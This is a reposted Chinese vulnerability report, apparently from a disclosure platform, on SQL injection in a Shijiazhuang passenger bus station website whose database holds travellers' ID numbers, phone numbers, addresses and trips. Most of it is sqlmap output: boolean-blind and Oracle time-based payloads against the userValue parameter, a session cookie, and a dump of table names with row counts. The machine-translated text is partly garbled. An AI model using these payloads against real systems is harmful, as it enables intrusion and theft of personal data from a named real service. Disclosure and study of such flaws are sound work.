石家庄客运总站某站点SQL注入(含旅客身份证号\手机号\住址\订单时间去向)

责声明">
漏洞标题 石家庄客运总站某站点SQL注入(含旅客身份证号\手机号\住址\订单时间去向) 相关厂商 石家庄客运总站 漏洞作者 路人甲 提交时间 2016-04-27 20:10 公开时间 2016-06…
Failure when receiving data from the peer Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3 userValue参数存在注入 1.png 1=1.png 1=2.png 盲目,直接在SQLMAP上 漏洞证明: 参数:#1 *(URI) 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷: **。**。**。**: 80/CheckUserValue?userValue=admin'and'1'='1'AND 9336=9336 AND'CUrZ'='CUrZ 输入:和/或基于时间的盲 标题: Oracle和基于时间的盲人 有效载荷: **。**。**。**: 80/CheckUserValue?userValue=admin'and'1'='1'AND 5097=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)|| CHR(118)|| CHR (85)|| CHR(99),5)AND'NaxB'='NaxB --- 后端DBMS: Oracle 当前架构(相当于Oracle上的数据库):'SJZWEB' 数据库: SJZWEB + ----------------------- + --------- + |表|参赛作品| + ----------------------- + --------- + | TB_WEB_ERROR | 2980653 | | TB_WEB_USER_LOG | 610631 | | TB_WEB_LOG | 422999 | | TB_IMAGE_VALID | 72548 | | TB_WEB_ALIPAY | 69898 | | TB_WEB_SEAT_LOCK | 33135 | | TB_WEB_ORDER | 26011 | | TB_WEB_USER | 16203 | | TB_WEB_USER_ONLINE | 13147 | | TB_WEB_MSG_SEND | 2033年| | TB_WEB_ORDER_BUILD | 1191 | | TB_CITY | 363 | | TB_NEW_SCHEDULE | 172 | | TB_WEB_TICKETSALE_UPD | 125 | | TB_WEB_ALL_ROUTE | 101 | | TB_PROVINCE | 34 | Failure when receiving data from the peer
  • 发表于 2016-07-17 08:00
  • 阅读 ( 427 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章